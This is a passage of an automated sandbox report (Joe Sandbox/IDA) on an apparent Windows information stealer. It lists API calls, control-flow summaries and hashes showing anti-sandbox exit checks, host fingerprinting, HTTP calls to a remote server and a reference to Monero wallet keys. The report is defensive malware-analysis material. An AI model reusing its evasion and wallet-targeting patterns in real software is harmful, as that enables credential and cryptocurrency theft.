                                      • ExitProcess.KERNEL32 ref: 005317D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: same set of associated memory dumps as listed above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID: block
                                      • API String ID: 621844428-2199623458
                                      • Opcode ID: 8395a02414958a94c74778c1535f9af45201e4d243e10fa79ca97cf9b3981fce
                                      • Instruction ID: 019a317c1681fad2e3794a1c5e13aa9f013c3f1efc0915154f84db39bd1dc5d2
                                      • Opcode Fuzzy Hash: 8395a02414958a94c74778c1535f9af45201e4d243e10fa79ca97cf9b3981fce
                                      • Instruction Fuzzy Hash: AA5178B5A0420AEFCB04DFA4D958FBE7BB5BF44304F108448E806AB280D774E955CB6A

                                      Control-flow Graph (function at 0x537500, basic blocks 0x537500-0x53768e)

                                      • Rendered graph omitted from the text dump. GetWindowsDirectoryA in the entry block, GetVolumeInformationA at 0x537553 followed by three calls to 0x538d00, a loop (0x5375d8/0x5375e1) with a further call to 0x538d00, then GetProcessHeap and RtlAllocateHeap at 0x5375fc and wsprintfA at 0x537628 (with the 0x53a740 subcall on both branches) before the return block at 0x53767e.
                                      APIs
                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00537542
                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0053757F
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00537603
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0053760A
                                      • wsprintfA.USER32 ref: 00537640
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: same set of associated memory dumps as listed above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                      • String ID: :$C$\$T
                                      • API String ID: 1544550907-4263779954
                                      • Opcode ID: a1725f09d0e15450bab67453e246fce0abf79b933d596b82f37bea402dd4a69e
                                      • Instruction ID: 11c3dc0d0469a87398f81c829cb48bbbe764004bc555cdb179d749079ae5d0d0
                                      • Opcode Fuzzy Hash: a1725f09d0e15450bab67453e246fce0abf79b933d596b82f37bea402dd4a69e
                                      • Instruction Fuzzy Hash: BB4171B1D04348ABDB14DB94DC55BEEBBB8BB48700F104599F50967280D7786A44CFA5

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F12BA0), ref: 005398A1
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F12CA8), ref: 005398BA
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F12CC0), ref: 005398D2
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F12B10), ref: 005398EA
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F12C60), ref: 00539903
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F19780), ref: 0053991B
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F05C70), ref: 00539933
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F05CB0), ref: 0053994C
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F12A80), ref: 00539964
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F12A98), ref: 0053997C
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F12AE0), ref: 00539995
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F12CD8), ref: 005399AD
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F05CF0), ref: 005399C5
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F12C78), ref: 005399DE
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 005211D0: ExitProcess.KERNEL32 ref: 00521211
                                        • Part of subcall function 00521160: GetSystemInfo.KERNEL32(?), ref: 0052116A
                                        • Part of subcall function 00521160: ExitProcess.KERNEL32 ref: 0052117E
                                        • Part of subcall function 00521110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0052112B
                                        • Part of subcall function 00521110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00521132
                                        • Part of subcall function 00521110: ExitProcess.KERNEL32 ref: 00521143
                                        • Part of subcall function 00521220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0052123E
                                        • Part of subcall function 00521220: __aulldiv.LIBCMT ref: 00521258
                                        • Part of subcall function 00521220: __aulldiv.LIBCMT ref: 00521266
                                        • Part of subcall function 00521220: ExitProcess.KERNEL32 ref: 00521294
                                        • Part of subcall function 00536770: GetUserDefaultLangID.KERNEL32 ref: 00536774
                                        • Part of subcall function 00521190: ExitProcess.KERNEL32 ref: 005211C6
                                        • Part of subcall function 00537850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005211B7), ref: 00537880
                                        • Part of subcall function 00537850: RtlAllocateHeap.NTDLL(00000000), ref: 00537887
                                        • Part of subcall function 00537850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0053789F
                                        • Part of subcall function 005378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00537910
                                        • Part of subcall function 005378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00537917
                                        • Part of subcall function 005378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0053792F
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00F19720,?,0054110C,?,00000000,?,00541110,?,00000000,00540AEF), ref: 00536ACA
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00536AE8
                                      • CloseHandle.KERNEL32(00000000), ref: 00536AF9
                                      • Sleep.KERNEL32(00001770), ref: 00536B04
                                      • CloseHandle.KERNEL32(?,00000000,?,00F19720,?,0054110C,?,00000000,?,00541110,?,00000000,00540AEF), ref: 00536B1A
                                      • ExitProcess.KERNEL32 ref: 00536B22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: same set of associated memory dumps as listed above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                      • String ID:
                                      • API String ID: 2525456742-0
                                      • Opcode ID: 428cb0ff89ada3efd0e3dbd7b40060360e7bf2c1a6eefc52e23ac653edbcd965
                                      • Instruction ID: ad38c0991aea8f0dd6b7a1847d2a5cabf32eb2edf304fe3d377bf1fa607b1e95
                                      • Opcode Fuzzy Hash: 428cb0ff89ada3efd0e3dbd7b40060360e7bf2c1a6eefc52e23ac653edbcd965
                                      • Instruction Fuzzy Hash: 9D31CD7190421ABADB04F7F0DC5ABEEBF78BF94340F108518F252B6191DF746905CAA6

                                       Control-flow Graph (basic blocks in address order; "->" lists the successor blocks)
                                       • 1436: 521220-521247, call 5389b0, GlobalMemoryStatusEx -> 1439, 1440
                                       • 1440: 521249-521271, call 53da00 (x2) -> 1442
                                       • 1439: 521273-52127a -> 1442
                                       • 1442: 521281-521285 -> 1444, 1445
                                       • 1444: 521287 -> 1447, 1448
                                       • 1448: 521289-521290 -> 1445, 1447
                                       • 1447: 521292-521294, ExitProcess
                                       • 1445: 52129a-52129d
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0052123E
                                      • __aulldiv.LIBCMT ref: 00521258
                                      • __aulldiv.LIBCMT ref: 00521266
                                      • ExitProcess.KERNEL32 ref: 00521294
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                      • String ID: @
                                      • API String ID: 3404098578-2766056989
                                      • Opcode ID: 83fb8dc7434d58a6364c3188a0d1318c4fa57fab9bc876e1b3dd737c2a4c94c4
                                      • Instruction ID: 2ca952180b0953edd14b8241d28bab7b06e0f56fbd47bc7d15ab3b23f2db1b85
                                      • Opcode Fuzzy Hash: 83fb8dc7434d58a6364c3188a0d1318c4fa57fab9bc876e1b3dd737c2a4c94c4
                                      • Instruction Fuzzy Hash: 3F014BB0944308FAEB10DBE0EC49BAEBB78BF54701F248048F606B62C0D6B465418BAD

                                       Control-flow Graph (basic blocks in address order; "->" lists the successor blocks)
                                       • 1453: 536aba-536ad7, call 53aad0, OpenEventA -> 1459, 1460
                                       • 1460: 536ad9-536af1, call 53aad0, CreateEventA -> 1454
                                       • 1450: 536af3 -> 1451
                                       • 1459: 536af5-536b04, CloseHandle, Sleep -> 1451
                                       • 1451: 536b0a -> 1453, 1454
                                       • 1454: 536b0c-536b22, call 536920, call 535b10, CloseHandle, ExitProcess
                                      APIs
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00F19720,?,0054110C,?,00000000,?,00541110,?,00000000,00540AEF), ref: 00536ACA
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00536AE8
                                      • CloseHandle.KERNEL32(00000000), ref: 00536AF9
                                      • Sleep.KERNEL32(00001770), ref: 00536B04
                                      • CloseHandle.KERNEL32(?,00000000,?,00F19720,?,0054110C,?,00000000,?,00541110,?,00000000,00540AEF), ref: 00536B1A
                                      • ExitProcess.KERNEL32 ref: 00536B22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                      • String ID:
                                      • API String ID: 941982115-0
                                      • Opcode ID: 23b143669540a31d1878a07588bcc63ec6e1b12d92e644be83e0a97fc93aa66f
                                      • Instruction ID: d8d0be18c76f2d67e9fa6a7ba99532c999f5e0c4a911e900d8c6833629b02715
                                      • Opcode Fuzzy Hash: 23b143669540a31d1878a07588bcc63ec6e1b12d92e644be83e0a97fc93aa66f
                                      • Instruction Fuzzy Hash: 4FF0DA7094031AFAE710ABA0DC2ABBDBF74FB44701F10C918F513B5191DBF45540DA6A

                                      APIs
                                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00524839
                                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00524849
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CrackInternetlstrlen
                                      • String ID: <
                                      • API String ID: 1274457161-4251816714
                                      • Opcode ID: 47ed21ff943519daa283c63f636a2069a2d8c2893a3e8d988e295c42cd126978
                                      • Instruction ID: f55206db7f9ce5b2df12a97c1d7ed32acb7865c198243f47cade5f5c50182ccc
                                      • Opcode Fuzzy Hash: 47ed21ff943519daa283c63f636a2069a2d8c2893a3e8d988e295c42cd126978
                                      • Instruction Fuzzy Hash: 93213BB1D00209ABDF14DFA4E849ADE7B75FB45320F108625F969A72C1EB706A09CF81

                                      APIs
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                        • Part of subcall function 00526280: InternetOpenA.WININET(00540DFE,00000001,00000000,00000000,00000000), ref: 005262E1
                                        • Part of subcall function 00526280: StrCmpCA.SHLWAPI(?,00F1E748), ref: 00526303
                                        • Part of subcall function 00526280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00526335
                                        • Part of subcall function 00526280: HttpOpenRequestA.WININET(00000000,GET,?,00F1DF48,00000000,00000000,00400100,00000000), ref: 00526385
                                        • Part of subcall function 00526280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005263BF
                                        • Part of subcall function 00526280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005263D1
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00535228
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                      • String ID: ERROR$ERROR
                                      • API String ID: 3287882509-2579291623
                                      • Opcode ID: db0b732f3470ce601eb5de66cdde40e036f3eae5deb3f9b3e748f0753bf286e8
                                      • Instruction ID: c0e4df16c99c9a7b783ebb6cab1229c0e067e5e9df9333d62b0893f010e242fa
                                      • Opcode Fuzzy Hash: db0b732f3470ce601eb5de66cdde40e036f3eae5deb3f9b3e748f0753bf286e8
                                      • Instruction Fuzzy Hash: 0E113030910549BBCB14FF74DD9AAED7B38BF90300F404558F84A5B192EF30AB05CA91
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00537910
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00537917
                                      • GetComputerNameA.KERNEL32(?,00000104), ref: 0053792F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateComputerNameProcess
                                      • String ID:
                                      • API String ID: 1664310425-0
                                      • Opcode ID: dc8e632ac10c72332e8558f8365eb1a9f943e38044b67fb378dd3a4f2780b799
                                      • Instruction ID: 316e02312ff8bd2e43fec3dec8879bc7407bb5a358625507023b073c8d2d7c57
                                      • Opcode Fuzzy Hash: dc8e632ac10c72332e8558f8365eb1a9f943e38044b67fb378dd3a4f2780b799
                                      • Instruction Fuzzy Hash: 8E0186B1904309EBCB10DF95DD45BAABFB8F704B21F104219FA45E7280C37859008FA5
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0052112B
                                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 00521132
                                      • ExitProcess.KERNEL32 ref: 00521143
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AllocCurrentExitNumaVirtual
                                      • String ID:
                                      • API String ID: 1103761159-0
                                      • Opcode ID: 551d70e11549fc5251d2b93311ef721d424c83314b6abbed607133bb6a83d475
                                      • Instruction ID: 97862873d78c811323761b92426d64e85ddd1355493c06392983e09941c8dcc8
                                      • Opcode Fuzzy Hash: 551d70e11549fc5251d2b93311ef721d424c83314b6abbed607133bb6a83d475
                                      • Instruction Fuzzy Hash: 28E0E670945309FBE7106BA0AC0EB097A78BF05B01F104054F709775D0D6F926409B9D
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 005210B3
                                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 005210F7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFree
                                      • String ID:
                                      • API String ID: 2087232378-0
                                      • Opcode ID: 533319df9c7f7da9de5c1e1ec15b5ec1f80dc4cde8e5a2c8703dcd780dc9ee2c
                                      • Instruction ID: 52fae7cd99a171404b202a574ecbb8f4a59876784560956302d1d11a41b3cc41
                                      • Opcode Fuzzy Hash: 533319df9c7f7da9de5c1e1ec15b5ec1f80dc4cde8e5a2c8703dcd780dc9ee2c
                                      • Instruction Fuzzy Hash: 2DF0E272641318BBE7149AA4AC4DFBBBBE8E706B15F305448F505E3280D572AF00CAA8
                                      APIs
                                        • Part of subcall function 005378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00537910
                                        • Part of subcall function 005378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00537917
                                        • Part of subcall function 005378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0053792F
                                        • Part of subcall function 00537850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005211B7), ref: 00537880
                                        • Part of subcall function 00537850: RtlAllocateHeap.NTDLL(00000000), ref: 00537887
                                        • Part of subcall function 00537850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0053789F
                                      • ExitProcess.KERNEL32 ref: 005211C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
